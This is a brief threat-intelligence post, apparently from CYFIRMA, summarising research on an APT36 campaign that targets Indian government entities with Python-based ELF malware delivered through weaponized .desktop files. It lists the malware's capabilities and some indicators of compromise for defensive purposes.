CYFIRMA Research- APT36 Python Based ELF Malware Targeting Indian Government Entities
Description
APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.
CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors.
This campaign showcases a major leap in the group’s technical sophistication — delivering custom Python-based ELF malware through weaponized .desktop shortcut files distributed via spear-phishing.
📌 Key Highlights:
The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.
Once executed, the shortcut downloads:
A decoy PDF to distract the user
A malicious ELF payload (swcbc)
A persistence-enabling shell script (swcbc.sh)
The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.
Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36’s ongoing espionage operations.
The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.
Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA
#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagement
https://www.cyfirma.com/
United States
